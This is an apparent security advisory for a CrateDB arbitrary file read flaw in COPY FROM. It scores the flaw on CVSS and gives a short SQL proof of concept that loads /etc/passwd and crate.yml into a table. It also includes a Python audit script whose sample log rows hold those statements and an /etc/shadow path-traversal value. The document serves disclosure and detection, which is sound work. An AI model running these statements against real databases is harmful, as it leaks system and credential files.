GitHub Advisory Database: GHSA-475G-VJ6C-XF96
History: Jan 30, 2024 - 8:57 p.m.

CrateDB database has an arbitrary file read vulnerability

Published: 2024-01-30 20:57:16
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')
Source: GitHub Advisory Database (github.com)
Tags: cratedb, arbitrary file read, vulnerability, authenticated users, import, information leakage

CVSS3: 6.5 Medium
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE

AI Score: 6.3 Medium (Confidence: High)
EPSS: 0.052 Low (Percentile: 93.0%)

Summary

CrateDB has an arbitrary file read vulnerability: any authenticated database user can read files on the database server's filesystem, limited only by what the CrateDB process itself is permitted to read.

Details

CrateDB's COPY FROM statement imports the contents of a file into a table. The source path is not restricted to a designated import location, so an authenticated user who can create a table and run COPY FROM can point it at any file the CrateDB process can read, load its contents into the table row by row, and then read them back with SELECT. The result is information leakage of files such as /etc/passwd or the node configuration.

PoC

-- one text column: every line of the imported file becomes a row
CREATE TABLE info_leak (info_leak STRING);
-- any file readable by the CrateDB process; header=false treats line one as data, not column names
COPY info_leak FROM '/etc/passwd' WITH (format='csv', header=false);
COPY info_leak FROM '/crate/config/crate.yml' WITH (format='csv', header=false);
SELECT * FROM info_leak;
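The PoC above is a single statement, so the practical defensive question is how to spot it. The following is an added example, not code from the advisory or from the CrateDB project: a small audit script that takes (statement, username) pairs, such as the stmt and username columns of CrateDB's sys.jobs_log (assuming job logging is enabled), and flags every COPY FROM that reads a local file outside an approved import directory. The sample rows and the allow-listed directory /data/imports are constructed for the example; the '..' handling is lexical only, since symlinks can only be resolved on the server.

```python
"""Flag COPY FROM statements that read local files outside an approved import directory.

Added example for the CrateDB COPY FROM arbitrary file read; the row shape,
the sample rows and the allow-listed directory are assumptions, not CrateDB defaults.
"""
import posixpath
import re
from urllib.parse import unquote, urlparse

# Constructed rows shaped like (stmt, username) from CrateDB's sys.jobs_log; not real log data.
# A live pull would be:  SELECT stmt, username FROM sys.jobs_log WHERE stmt ILIKE 'copy%from%';
SAMPLE_JOBS_LOG = [
    ("CREATE TABLE info_leak (info_leak STRING)", "analyst"),
    ("COPY info_leak FROM '/etc/passwd' WITH (format='csv', header=false)", "analyst"),
    ("copy info_leak from 'file:///crate/config/crate.yml' with (format='csv', header=false)", "analyst"),
    ("COPY events FROM '/data/imports/events.json'", "etl"),
    ("COPY events FROM 's3://bucket/events/*.json'", "etl"),
    ("COPY events FROM '/data/imports/../../etc/shadow' WITH (format='csv', header=false)", "analyst"),
    ("SELECT * FROM info_leak", "analyst"),
]

# Assumed site policy: local-file imports may only come from this directory.
ALLOWED_IMPORT_DIR = "/data/imports"

# Minimal parser for  COPY <table> FROM '<uri>' ...  (table may be schema-qualified or quoted).
# It does not handle the PARTITION clause; extend the pattern if your workload uses it.
COPY_FROM_RE = re.compile(r"^\s*COPY\s+\S+\s+FROM\s+'([^']+)'", re.IGNORECASE)


def copy_source(stmt: str):
    """Return the quoted source URI of a COPY ... FROM statement, or None for any other SQL."""
    m = COPY_FROM_RE.match(stmt)
    return m.group(1) if m else None


def local_path(uri: str):
    """Map a bare path or file:// URI to a normalised absolute path.

    Returns None for remote schemes (s3://, http://...), which are not local file reads.
    """
    parsed = urlparse(uri)
    if parsed.scheme == "":
        raw = uri
    elif parsed.scheme == "file":
        raw = unquote(parsed.path)
    else:
        return None
    # Lexical normalisation collapses '.' and '..'; it cannot see symlinks.
    return posixpath.normpath(raw)


def outside_allowed(path: str, allowed_dir: str = ALLOWED_IMPORT_DIR) -> bool:
    """True when path is neither the allowed directory nor beneath it (prefix match on a path boundary)."""
    allowed = posixpath.normpath(allowed_dir)
    return not (path == allowed or path.startswith(allowed + "/"))


def audit(rows, allowed_dir: str = ALLOWED_IMPORT_DIR):
    """Return (username, resolved_path, stmt) for every local-file COPY FROM outside allowed_dir."""
    findings = []
    for stmt, username in rows:
        src = copy_source(stmt)
        if src is None:
            continue
        path = local_path(src)
        if path is not None and outside_allowed(path, allowed_dir):
            findings.append((username, path, stmt))
    return findings


if __name__ == "__main__":
    for user, path, stmt in audit(SAMPLE_JOBS_LOG):
        print(f"{user}: local file read outside {ALLOWED_IMPORT_DIR}: {path}  <- {stmt}")
```

Run against the constructed rows, the script reports the two PoC statements and the traversal attempt, while the legitimate import from /data/imports and the S3 import pass. Note that the match on the allowed directory is done on a path boundary, so /data/importsX is not mistaken for a child of /data/imports.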


Impact

At the time of this advisory the vulnerability affected all current versions of CrateDB. Configuration files, credentials and other sensitive data obtained this way can be used to mount further attacks, and CrateDB Cloud clusters were affected as well.

Affected configurations

Vulners node match:
io.crate:crate 5.6.0
OR io.crate:crate (version not shown)
OR io.crate:crate (version not shown)
OR io.crate:crate (version not shown)

